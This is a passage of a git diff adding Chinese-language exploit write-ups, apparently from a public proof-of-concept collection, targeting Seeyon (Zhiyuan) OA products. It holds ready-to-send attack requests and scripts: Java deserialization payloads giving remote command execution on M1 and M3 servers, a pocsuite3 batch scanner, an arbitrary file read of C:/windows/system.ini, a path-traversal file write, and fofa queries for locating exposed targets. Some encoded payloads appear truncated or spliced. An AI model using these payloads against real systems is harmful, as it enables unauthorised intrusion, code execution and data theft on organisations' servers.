nFZWFpoTDNWMGFXd3ZVMk5oYm01bGNnY0JUQXdCVFFGT0RBQ0RBVThCQUFKY1lRd0JVQUZSREFGU0FWTU1BVlFCRVF3QlZRRk9EQUZXQUlRQkFBY3ZZbWx1TDNOb0FRQUhZMjFrTG1WNFpRd0FqQUZYQVFBUGFtRjJZUzl1WlhRdlUyOWphMlYwREFGWUFTWU1BSU1CV1F3QldnRmJEQUZjQVZNSEFWME1BVjRCSmd3Qlh3RW1Cd0ZnREFGaEFUQU1BV0lBaEF3Qll3RmtEQUZsQVNZTUFXWUFoQUVBSFhKbGRtVnljMlVnWlhobFkzVjBaU0JsY25KdmNpd2diWE5uSUMwK0FRQUJJUUVBRTNKbGRtVnljMlVnWlhobFkzVjBaU0J2YXlFQkFBSkJOQUVBQjJadmNrNWhiV1VCQUFwblpYUk5aWE56WVdkbEFRQVVLQ2xNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNCQUJVb1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0tWWUJBQkJxWVhaaEwyeGhibWN2VkdoeVpXRmtBUUFOWTNWeWNtVnVkRlJvY21WaFpBRUFGQ2dwVEdwaGRtRXZiR0Z1Wnk5VWFISmxZV1E3QVFBT1oyVjBWR2h5WldGa1IzSnZkWEFCQUJrb0tVeHFZWFpoTDJ4aGJtY3ZWR2h5WldGa1IzSnZkWEE3QVFBSVoyVjBRMnhoYzNNQkFCTW9LVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFRWjJWMFJHVmpiR0Z5WldSR2FXVnNaQUVBTFNoTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrT3dFQUYycGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrQVFBTmMyVjBRV05qWlhOemFXSnNaUUVBQkNoYUtWWUJBQU5uWlhRQkFDWW9UR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBQjJkbGRFNWhiV1VCQUFoamIyNTBZV2x1Y3dFQUd5aE1hbUYyWVM5c1lXNW5MME5vWVhKVFpYRjFaVzVqWlRzcFdnRUFEV2RsZEZOMWNHVnlZMnhoYzNNQkFBUnphWHBsQVFBREtDbEpBUUFWS0VrcFRHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN0FRQUpaMlYwVFdWMGFHOWtBUUJBS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuTzF0TWFtRjJZUzlzWVc1bkwwTnNZWE56T3lsTWFtRjJZUzlzWVc1bkwzSmxabXhsWTNRdlRXVjBhRzlrT3dFQUdHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwMWxkR2h2WkFFQUJtbHVkbTlyWlFFQU9TaE1hbUYyWVM5c1lXNW5MMDlpYW1WamREdGJUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBQ0dkbGRFSjVkR1Z6QVFBRUtDbGJRZ0VBQkZSWlVFVUJBQVFvU1NsV0FRQUxibVYzU1c1emRHRnVZMlVCQUJRb0tVeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME93RUFFV2RsZEVSbFkyeGhjbVZrVFdWMGFHOWtBUUFWWjJWMFEyOXVkR1Y0ZEVOc1lYTnpURzloWkdWeUFRQVpLQ2xNYW1GMllTOXNZVzVuTDBOc1lYTnpURzloWkdWeU93RUFGV3BoZG1FdmJHRnVaeTlEYkdGemMweHZZV1JsY2dFQUJtVnhkV0ZzY3dFQUZTaE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc3BXZ0VBQkhSeWFXMEJBQXB6ZEdGeWRITlhhWFJvQVFBVktFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk95bGFBUUFIY21Wd2JHRmpaUUVBUkNoTWFtRjJZUzlzWVc1bkwwTm9ZWEpUWlhGMVpXNWpaVHRNYW1GMllTOXNZVzVuTDBOb1lYSlRaWEYxWlc1alpUc3BUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdBUUFGYzNCc2FYUUJBQ2NvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1Z0TWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBZDJZV3gxWlU5bUFRQW5LRXhxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxNYW1GMllTOXNZVzVuTDBsdWRHVm5aWEk3QVFBUWFtRjJZUzlzWVc1bkwxTjVjM1JsYlFFQUMyZGxkRkJ5YjNCbGNuUjVBUUFMZEc5TWIzZGxja05oYzJVQkFBWmhjSEJsYm1RQkFDd29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2VTNSeWFXNW5RblZtWm1WeU93RUFDSFJ2VTNSeWFXNW5BUUFSYW1GMllTOXNZVzVuTDFKMWJuUnBiV1VCQUFwblpYUlNkVzUwYVcxbEFRQVZLQ2xNYW1GMllTOXNZVzVuTDFKMWJuUnBiV1U3QVFBb0tGdE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlRY205alpYTnpPd0VBRVdwaGRtRXZiR0Z1Wnk5UWNtOWpaWE56QVFBT1oyVjBTVzV3ZFhSVGRISmxZVzBCQUJjb0tVeHFZWFpoTDJsdkwwbHVjSFYwVTNSeVpXRnRPd0VBR0NoTWFtRjJZUzlwYnk5SmJuQjFkRk4wY21WaGJUc3BWZ0VBREhWelpVUmxiR2x0YVhSbGNnRUFKeWhNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNwVEdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5T3dFQUIyaGhjMDVsZUhRQkFBTW9LVm9CQUFSdVpYaDBBUUFPWjJWMFJYSnliM0pUZEhKbFlXMEJBQWRrWlhOMGNtOTVBUUFuS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3lsTWFtRjJZUzlzWVc1bkwxQnliMk5sYzNNN0FRQUlhVzUwVm1Gc2RXVUJBQllvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3U1NsV0FRQVBaMlYwVDNWMGNIVjBVM1J5WldGdEFRQVlLQ2xNYW1GMllTOXBieTlQZFhSd2RYUlRkSEpsWVcwN0FRQUlhWE5EYkc5elpXUUJBQk5xWVhaaEwybHZMMGx1Y0hWMFUzUnlaV0Z0QVFBSllYWmhhV3hoWW14bEFRQUVjbVZoWkFFQUZHcGhkbUV2YVc4dlQzVjBjSFYwVTNSeVpXRnRBUUFGZDNKcGRHVUJBQVZtYkhWemFBRUFCWE5zWldWd0FRQUVLRW9wVmdFQUNXVjRhWFJXWVd4MVpRRUFCV05zYjNObEFDRUFmZ0FpQUFBQUFnQUlBSDhBZ0FBQkFJRUFBQUFBQUFnQWdnQ0FBQUVBZ1FBQUFBQUFCZ0FCQUlNQWhBQUNBSVVBQUFRUkFBZ0FFUUFBQXRFcXR3QUd1QUFIdGdBSVRDdTJBQWtTQ3JZQUMwMHNCTFlBREN3cnRnQU53QUFPd0FBT1RnTTJCQlVFTGI2aUFxTXRGUVF5T2dVWkJjY0FCcWNDanhrRnRnQVBPZ1laQmhJUXRnQVJtZ0FOR1FZU0VyWUFFWm9BQnFjQ2NSa0Z0Z0FKRWhPMkFBdE5MQVMyQUF3c0dRVzJBQTA2QnhrSHdRQVVtZ0FHcHdKT0dRZTJBQWtTRmJZQUMwMHNCTFlBREN3WkI3WUFEVG9IR1FlMkFBa1NGcllBQzAybkFCWTZDQmtIdGdBSnRnQVl0Z0FZRWhhMkFBdE5MQVMyQUF3c0dRZTJBQTA2QnhrSHRnQUp0Z0FZRWhtMkFBdE5wd0FRT2dnWkI3WUFDUkladGdBTFRTd0V0Z0FNTEJrSHRnQU5PZ2NaQjdZQUNSSWF0Z0FMVFN3RXRnQU1MQmtIdGdBTndBQWJ3QUFiT2dnRE5na1ZDUmtJdVFBY0FRQ2lBYWdaQ0JVSnVRQWRBZ0E2Q2hrS3RnQUpFaDYyQUF0TkxBUzJBQXdzR1FxMkFBMDZDeGtMdGdBSkVoOER2UUFndGdBaEdRc0R2UUFpdGdBak9nd1pDN1lBQ1JJa0JMMEFJRmtEc2dBbHh3QVBFaWE0QUNkWnN3QWxwd0FHc2dBbFU3WUFJUmtMQkwwQUlsa0RFaWhUdGdBandBQXBPZzBaRGNjQUJxY0JKU29aRGJZQUtyWUFLem9PR1F5MkFBa1NMQVM5QUNCWkE3SUFMVk8yQUNFWkRBUzlBQ0paQTdzQUxsa1JBTWkzQUM5VHRnQWpWeW9TTUxZQU1Ub1BHUSsyQURJNkJ4a1BFak1HdlFBZ1dRT3lBRFRIQUE4U05iZ0FKMW16QURTbkFBYXlBRFJUV1FTeUFDMVRXUVd5QUMxVHRnQTJHUWNHdlFBaVdRTVpEbE5aQkxzQUxsa0R0d0F2VTFrRnV3QXVXUmtPdnJjQUwxTzJBQ05YR1F5MkFBa1NOd1M5QUNCWkF4a1BVN1lBSVJrTUJMMEFJbGtER1FkVHRnQWpWNmNBWWpvUEtoSTV0Z0F4T2hBWkVCSTZCTDBBSUZrRHNnQTB4d0FQRWpXNEFDZFpzd0EwcHdBR3NnQTBVN1lBTmhrUUJMMEFJbGtER1E1VHRnQWpPZ2NaRExZQUNSSTNCTDBBSUZrREdSQlR0Z0FoR1F3RXZRQWlXUU1aQjFPMkFDTlhwd0FYaEFrQnAvNVNwd0FJT2dhbkFBT0VCQUduL1Z5eEFBZ0Fsd0NpQUtVQUZ3REZBTk1BMWdBWEFkQUNWd0phQURnQU5nQTdBc1VBT0FBK0FGa0N4UUE0QUZ3QWZBTEZBRGdBZndLNUFzVUFPQUs4QXNJQ3hRQTRBQUVBaGdBQUFPNEFPd0FBQUEwQUJBQU9BQXNBRHdBVkFCQUFHZ0FSQUNZQUV3QXdBQlFBTmdBV0FENEFGd0JGQUJnQVhBQVpBR2NBR2dCc0FCc0FkQUFjQUg4QUhRQ0tBQjRBandBZkFKY0FJUUNpQUNRQXBRQWlBS2NBSXdDNEFDVUF2UUFtQU1VQUtBRFRBQ3NBMWdBcEFOZ0FLZ0RqQUN3QTZBQXRBUEFBTGdEN0FDOEJBQUF3QVE0QU1RRWRBRElCS0FBekFUTUFOQUU0QURVQlFBQTJBVmtBTndHU0FEZ0Jsd0E1QVpvQU93R2xBRHdCMEFBK0FkZ0FQd0hmQUVBQ05RQkJBbGNBUmdKYUFFSUNYQUJEQW1RQVJBS1hBRVVDdVFCSEFyd0FNUUxDQUVzQ3hRQkpBc2NBU2dMS0FCTUMwQUJOQUljQUFBQUVBQUVBT0FBQkFJZ0FpUUFDQUlVQUFBQTVBQUlBQXdBQUFCRXJ1QUFCc0UyNEFBZTJBRHNydGdBOHNBQUJBQUFBQkFBRkFBSUFBUUNHQUFBQURnQURBQUFBVndBRkFGZ0FCZ0JaQUljQUFBQUVBQUVBQWdBQkFJb0Fpd0FCQUlVQUFBQ1BBQVFBQXdBQUFGY3J4Z0FNRWowcnRnQSttUUFHRWord0s3WUFRRXdyRWtHMkFFS1pBQ2dyRWtFU1BiWUFReEpFdGdCRlRTeStCWjhBQmhKR3NDb3NBeklzQkRLNEFFZTJBRWl3S2lzU1FSSTl0Z0JERWtrU1BiWUFRN1lBU3JBQUFBQUJBSVlBQUFBbUFBa0FBQUJqQUEwQVpBQVFBR1lBRlFCbkFCNEFhUUFzQUdvQU1nQnJBRFVBYlFCREFHOEFBUUNNQUlzQUFRQ0ZBQUFCeWdBRUFBa0FBQUVxRWt1NEFFeTJBRTFOSzdZQVFFd0JUZ0U2QkN3U1RyWUFFWmtBUUNzU1Q3WUFFWmtBSUNzU1VMWUFFWm9BRjdzQVVWbTNBRklydGdCVEVsUzJBRk8yQUZWTUJyMEFLVmtERWloVFdRUVNWbE5aQlN0VE9nU25BRDByRWsrMkFCR1pBQ0FyRWxDMkFCR2FBQmU3QUZGWnR3QlNLN1lBVXhKWHRnQlR0Z0JWVEFhOUFDbFpBeEpZVTFrRUVsbFRXUVVyVXpvRXVBQmFHUVMyQUZ0T3V3QmNXUzIyQUYyM0FGNFNYN1lBWURvRkdRVzJBR0daQUFzWkJiWUFZcWNBQlJJOU9nYTdBRnhaTGJZQVk3Y0FYaEpmdGdCZ09nVzdBRkZadHdCU0dRYTJBRk1aQmJZQVlaa0FDeGtGdGdCaXB3QUZFajIyQUZPMkFGVTZCaGtHT2djdHhnQUhMYllBWkJrSHNEb0ZHUVcyQUdVNkJpM0dBQWN0dGdCa0dRYXdPZ2d0eGdBSExiWUFaQmtJdndBRUFKTUEvZ0VKQURnQWt3RCtBUjBBQUFFSkFSSUJIUUFBQVIwQkh3RWRBQUFBQVFDR0FBQUFiZ0FiQUFBQWN3QUpBSFFBRGdCMUFCQUFkZ0FUQUhjQUhBQjRBQzRBZVFCQ0FIc0FXUUI5QUdzQWZnQi9BSUFBa3dDREFKd0FoQUN1QUlVQXdnQ0dBTlFBaHdENkFJZ0EvZ0NNQVFJQWpRRUdBSWdCQ1FDSkFRc0FpZ0VTQUl3QkZnQ05BUm9BaWdFZEFJd0JJd0NOQUFFQWpRQ09BQUVBaFFBQUFZTUFCQUFNQUFBQTh4Skx1QUJNdGdCTkVrNjJBQkdhQUJDN0FDbFpFbWEzQUdkT3B3QU51d0FwV1JKb3R3Qm5UcmdBV2kyMkFHazZCTHNBYWxrckxMWUFhN2NBYkRvRkdRUzJBRjA2QmhrRXRnQmpPZ2NaQmJZQWJUb0lHUVMyQUc0NkNSa0Z0Z0J2T2dvWkJiWUFjSm9BWUJrR3RnQnhuZ0FRR1FvWkJyWUFjcllBYzZmLzdoa0h0Z0J4bmdBUUdRb1pCN1lBY3JZQWM2Zi83aGtJdGdCeG5nQVFHUWtaQ0xZQWNyWUFjNmYvN2hrS3RnQjBHUW0yQUhRVUFIVzRBSGNaQkxZQWVGZW5BQWc2QzZmL25oa0V0Z0JrR1FXMkFIbW5BQ0JPdXdCUldiY0FVaEo2dGdCVExiWUFlN1lBVXhKOHRnQlR0Z0JWc0JKOXNBQUNBTGdBdmdEQkFEZ0FBQURRQU5NQU9BQUJBSVlBQUFCdUFCc0FBQUNiQUJBQW5BQWRBSjRBSndDZ0FEQUFvUUErQUtJQVV3Q2pBR0VBcEFCcEFLVUFjUUNtQUg0QXFBQ0dBS2tBa3dDckFKc0FyQUNvQUs0QXJRQ3ZBTElBc0FDNEFMSUF2Z0N6QU1FQXRBRERBTFVBeGdDM0FNc0F1QURRQUxzQTB3QzVBTlFBdWdEd0FMd0FDQUNQQUlrQUFnQ0ZBQUFBTWdBREFBSUFBQUFTS3JnQUFiQk11d0FEV1N1MkFBUzNBQVcvQUFFQUFBQUVBQVVBQWdBQkFJWUFBQUFHQUFFQUFBQTNBSUVBQUFBQUFBRUFrQUFBQUFJQWtRPT0iOwpjbHogPSBkZWZpbmVDbGFzcyhiYXNlNjREZWNvZGVUb0J5dGUoY29kZSkpOwpjbHoubmV3SW5zdGFuY2UoKTt0AARldmFsdXEAfgAbAAAAAXEAfgAjc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4eHg=")
+    req = requests.post(burp0_url, headers=headers, data=raw_data, verify=False)
+    if req.status_code==200:
+        return req.text
+    return ""
+    
+if __name__=="__main__":
+    target = sys.argv[1]
+    info = verify(target)
+    if info != "":
+        print("[+]漏洞存在, 执行命令 ver 的结果为：", info)
+    else:
+        print("[-]漏洞不存在")
 
 ```
diff --git a/致远M1-usertokenservice-反序列化RCE漏洞.md b/致远M1-usertokenservice-反序列化RCE漏洞.md
new file mode 100644
index 0000000..dd39d9e
--- /dev/null
+++ b/致远M1-usertokenservice-反序列化RCE漏洞.md
@@ -0,0 +1,147 @@
+## 致远M1 usertokenservice 反序列化RCE漏洞
+
+## fofa
+```
+"M1-Server 已启动"
+```
+
+## poc
+```
+POST /esn_mobile_pns/service/userTokenService HTTP/1.1
+Host: {{Hostname}}
+User-Agent: Mozilla/5.0 
+Content-Type: application/x-www-form-urlencoded
+cmd: @@@@@echo test
+
+{{base64_decode("rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABHNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAHQAC25ld0luc3RhbmNldXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAAAc3EAfgATdXEAfgAYAAAAAXQAAmpzdAAPZ2V0RW5naW5lQnlOYW1ldXEAfgAbAAAAAXZyABBqYXZhLmxhbmcuU3RyaW5noPCkOHo7s0ICAAB4cHNxAH4AE3VxAH4AGAAAAAF0LWx0cnkgewogIGxvYWQoIm5hc2hvcm46bW96aWxsYV9jb21wYXQuanMiKTsKfSBjYXRjaCAoZSkge30KZnVuY3Rpb24gZ2V0VW5zYWZlKCl7CiAgdmFyIHRoZVVuc2FmZU1ldGhvZCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJzdW4ubWlzYy5VbnNhZmUiKS5nZXREZWNsYXJlZEZpZWxkKCd0aGVVbnNhZmUnKTsKICB0aGVVbnNhZmVNZXRob2Quc2V0QWNjZXNzaWJsZSh0cnVlKTsgCiAgcmV0dXJuIHRoZVVuc2FmZU1ldGhvZC5nZXQobnVsbCk7Cn0KZnVuY3Rpb24gcmVtb3ZlQ2xhc3NDYWNoZShjbGF6eil7CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpOwogIHZhciBjbGF6ekFub255bW91c0NsYXNzID0gdW5zYWZlLmRlZmluZUFub255bW91c0NsYXNzKGNsYXp6LGphdmE
+```
+
+## 批量检测脚本
+```python
+#!/usr/bin/env python
+
+# coding: utf-8
+
+
+
+from pocsuite3.api import (
+
+    POCBase, Output, register_poc, logger, requests, OptDict, OptString, VUL_TYPE,
+
+    REVERSE_PAYLOAD, POC_CATEGORY
+
+)
+
+
+
+class POC(POCBase):
+
+    vulID = '1'
+
+    version = '1'
+
+    author = ['AuthorName']
+
+    vulDate = '2023-08-15'
+
+    createDate = '2023-08-15'
+
+    updateDate = '2023-08-15'
+
+    references = ['']
+
+    name = 'POC Name'
+
+    appPowerLink = ''
+
+    appName = 'Application Name'
+
+    appVersion = ''
+
+    vulType = VUL_TYPE.COMMAND_EXECUTION
+
+    desc = '''
+
+        Description of the vulnerability.
+
+    '''
+
+    samples = ['']
+
+    install_requires = ['']
+
+    pocDesc = '''
+
+    How to use the POC.
+
+    '''
+
+    category = POC_CATEGORY.EXPLOITS.REMOTE
+
+
+
+    def _verify(self):
+
+        result = {}
+
+        path = '/esn_mobile_pns/service/userTokenService'
+
+        headers = {
+
+            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
+
+            'Connection': 'close',
+
+            'Content-Type': 'application/x-www-form-urlencoded',
+
+            'Accept-Encoding': 'gzip, deflate',
+
+            'cmd': '@@@@@echo Test',
+
+        }
+
+        data = '''{{base64dec(rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABHNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldG
+
+hvZHQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lNZXRob2RxAH4ACnhyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAACnQAGVJGOkpNb2RlbFJlc3VsdHQAG0xqYXZhL2xhbmcvU3RyaW5nO3hwc3EAfgAKc3IAJm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnlUiqsSmzlVCAIAAUwAA21hcHQAQkxqYXZhL2xhbmcvT2JqZWN0O3hwc3IAFGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwc3EAfgAJeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJUcmFuc2Zvcm1lcrN5Y+2Zs1QDAAB4cHcEAAAAAHg=
+
+'''
+
+        response = requests.post(self.url + path, headers=headers, data=data)
+
+        if response.status_code == 200 and "Test" in response.text:
+
+            result['VerifyInfo'] = {}
+
+            result['VerifyInfo']['URL'] = self.url + path
+
+            result['VerifyInfo']['Payload'] = headers['cmd']
+
+        return self.parse_output(result)
+
+
+
+    def _attack(self):
+
+        return self._verify()
+
+
+
+    def _parse_output(self, output):
+
+        parsed_output = Output(self)
+
+        if output:
+
+            parsed_output.success(output)
+
+        else:
+
+            parsed_output.fail("Exploit failed. Target is not vulnerable.")
+
+        return parsed_output
+
+
+
+register_poc(POC)
+
+```
diff --git a/致远OA-M3-Server-反序列化漏洞.md b/致远OA-M3-Server-反序列化漏洞.md
new file mode 100644
index 0000000..423fb4f
--- /dev/null
+++ b/致远OA-M3-Server-反序列化漏洞.md
@@ -0,0 +1,45 @@
+
+## 致远OA M3 Server 反序列化漏洞
+致远 M3 反序列化 远程命令执行漏洞（XVE-2023-24878）
+
+漏洞信息：
+https://x.threatbook.com/v5/vul/6bf25402a41b4fc27497a5b42a8421d7ef38d57cb7d8143dedb9a6f438310a2d9e083c39c56fee2571651827b4d9ce8d
+
+
+
+## fofa
+```
+"M3-Server 已启动"
+```
+
+根据群友说，这个漏洞是fastjson反序列化
+
+利用 CB1 生成 hex 反序列化数据，替换 POC 中的 HEX
+
+## poc
+```
+POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1
+Host: User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: Hm_lvt_82116c626a8d504a5c0675073362ef6f=1666334057
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Content-Type: application/json
+Content-Length: 3680
+
+[{"userMessageId":"{\"@\u0074\u0079\u0070\u0065\":\"\u0063\u006f\u006d\u002e\u006d\u0063\u0068\u0061\u006e\u0067\u0065\u002e\u0076\u0032\u002e\u0063\u0033\u0070\u0030\u002e\u0057\u0072\u0061\u0070\u0070\u0065\u0072\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0050\u006f\u006f\u006c\u0044\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\",\"\u0075\u0073\u0065\u0072\u004f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0073\u0041\u0073\u0053\u0074\u0072\u0069\u006e\u0067\":\"\u0048\u0065\u0078\u0041\u0073\u0063\u0069\u0069\u0053\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0064\u004d\u0061\u0070:HEX;\"}|","channelId":"111","title":"111","content":"222","deviceType":"androidphone","serviceProvider":"baidu","deviceFirm":"other"}]
+```
+然后再 Get 访问/mobile_portal/api/systemLog/pns/loadLog/app.log
+
+![ef21d114d1965815537db98570d2daf7](https://github.com/wy876/POC/assets/139549762/b3609c72-0516-4c69-a64f-62c86fffb30d)
+
+## 漏洞分析
+```
+https://mp.weixin.qq.com/s/czbhaf7jpNmgjAt-OFWmIA
+```
diff --git a/致远OA-wpsAssistServlet任意文件读取漏洞.md b/致远OA-wpsAssistServlet任意文件读取漏洞.md
new file mode 100644
index 0000000..4c3df05
--- /dev/null
+++ b/致远OA-wpsAssistServlet任意文件读取漏洞.md
@@ -0,0 +1,14 @@
+## 致远OA wpsAssistServlet任意文件读取漏洞
+
+## POC
+```
+POST /seeyon/wpsAssistServlet HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept: */*
+Connection: Keep-Alive
+Content-Length: 47
+Content-Type: application/x-www-form-urlencoded
+
+flag=template&templateUrl=C:/windows/system.ini
+```
diff --git a/致远OA后台表单导入任意文件写入漏洞.md b/致远OA后台表单导入任意文件写入漏洞.md
new file mode 100644
index 0000000..1adab6f
--- /dev/null
+++ b/致远OA后台表单导入任意文件写入漏洞.md
@@ -0,0 +1,35 @@
+# 致远OA后台表单导入任意文件写入漏洞
+
+致远OA后台表单导入任意文件写入漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+app="致远互联-OA"
+```
+
+## poc
+
+```javascript
+POST /seeyon/ajax.do?method=ajaxAction&managerName=cap4FormDesignManager HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
+Connection: keep-alive
+Content-Length: 331
+Content-Type: application/x-www-form-urlencoded;charset=UTF-8
+Cookie: ts=1728653264995; JSESSIONID=EADD9E1D7E239870F85E73935AC9AD34; loginPageURL=; login_locale=zh_CN; avatarImageUrl=5995465946958220283
+Host: 192.168.18.129:8085
+RequestType: AJAX
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0
+
+managerMethod=generateInfopath&arguments={"files":[{"fileName":"../../../../../../ApacheJetspeed/webapps/seeyon/11.txt","fileContent":"1111"}]}
+```
+
